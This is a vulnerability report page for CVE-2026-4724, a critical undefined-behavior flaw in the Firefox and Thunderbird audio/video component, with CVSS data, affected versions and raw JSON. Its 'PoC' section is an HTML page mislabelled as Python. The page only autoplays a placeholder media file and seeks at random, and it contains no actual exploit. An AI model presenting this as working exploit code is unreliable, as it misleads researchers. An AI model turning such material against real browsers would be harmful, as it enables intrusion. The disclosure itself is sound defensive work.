Security Vulnerability Report
中文
CVE-2026-4724 CVSS 9.1 CRITICAL

CVE-2026-4724

Published: 2026-03-24 13:16:08
Last Modified: 2026-04-13 15:17:45

Description

Undefined behavior in the Audio/Video component. This vulnerability was fixed in Firefox 149 and Thunderbird 149.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:* - VULNERABLE
Mozilla Firefox < 149
Mozilla Thunderbird < 149

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2026-4724 Description: This HTML PoC attempts to trigger the undefined behavior in the Audio/Video component. Note: Replace 'malformed_media.mp4' with a specifically crafted file that exploits the parsing logic. --> <!DOCTYPE html> <html> <head> <title>CVE-2026-4724 PoC</title> </head> <body> <h1>CVE-2026-4724 Audio/Video Undefined Behavior Test</h1> <!-- Embed the malicious media file to trigger the parser --> <video id="vulnVideo" controls autoplay> <source src="malformed_media.mp4" type="video/mp4"> Browser does not support video tag. </video> <script> const video = document.getElementById('vulnVideo'); // Attempt to play the video to trigger the parsing routines video.play().catch(e => { console.log("Autoplay blocked or error:", e); }); // Aggressively seek to stress the media parser logic setInterval(() => { if (!video.paused) { video.currentTime = Math.random() * video.duration; } }, 200); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4724", "sourceIdentifier": "[email protected]", "published": "2026-03-24T13:16:08.280", "lastModified": "2026-04-13T15:17:44.733", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Undefined behavior in the Audio/Video component. This vulnerability was fixed in Firefox 149 and Thunderbird 149."}, {"lang": "es", "value": "Comportamiento indefinido en el componente de Audio/Video. Esta vulnerabilidad afecta a Firefox &lt; 149 y Thunderbird &lt; 149."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-758"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:*:*:*:*", "versionEndExcluding": "149.0", "matchCriteriaId": "EC415708-0D12-42F6-801D-6884F4F01CD9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:*", "versionEndExcluding": "149.0", "matchCriteriaId": "98D01327-B65C-4FE2-8BBE-98C3555CF8E0"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=2014865", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-20/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-23/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}